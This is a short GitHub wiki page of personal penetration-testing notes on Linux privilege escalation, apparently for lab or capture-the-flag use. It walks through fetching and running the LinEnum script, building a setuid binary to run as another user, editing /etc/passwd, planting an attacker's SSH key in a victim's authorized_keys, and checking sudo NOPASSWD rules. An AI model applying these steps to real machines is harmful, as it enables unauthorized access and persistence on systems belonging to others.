-
Notifications
You must be signed in to change notification settings - Fork 14
Linux escalate steps
lethanhtung01011980 edited this page Apr 23, 2020
·
19 revisions
- From nobody to user
- From User to root
Already have shell access
- https://github.com/rebootuser/LinEnum
wget https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
./LinEnum.sh -t -r LinEnumRpt
Methods
- Can attack using user with same uid and gid as with victim uer in victim PC
- Via NFS root_squash,no_all_squash
To use setuid to execute as a user
- Sample code https://github.com/lethanhtung01011980/Notes/blob/master/runAsOtherLinuxUser.c
- su - frank
- vim runAsOtherLinuxUser.c
- gcc runAsOtherLinuxUser.c -o runAsOtherLinuxUser
- chmod u+s runAsOtherLinuxUser
- In victim PC, ./runAsOtherLinuxUser
- We can edit /etc/passwd to change the uid and gid for a user
Try to generate ssh key to login as a user
- root is attacker user in Kali. frank is victim user in victim PC.
- In attacker, ssh-keygen to generate private / public key with
id-frank
file name. - Copy public key of attackers to victim's
/home/frank/.ssh/authorized_keys
- Attacker to login as frank:
ssh -i /root/.ssh id-frank frank@victim-ip
To if can run sudo with "NOPASSWD" aka as root:
sudo -l
User frank may run the following commands on this host:
(frank) NOPASSWD: /opt/logreader/logreader.sh
(adm) NOPASSWD: /usr/bin/rvim /var/www/html/jailuser/dev/jail.c
If see "Vim: Warning: Output is not to a terminal"
- Type
ZQ
keybase-redirector PoE
- keybase-redirector PoE: https://hackerone.com/reports/426944
Or run LinEnum
- https://github.com/rebootuser/LinEnum
- wget https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
./LinEnum.sh -t -r LinEnumRpt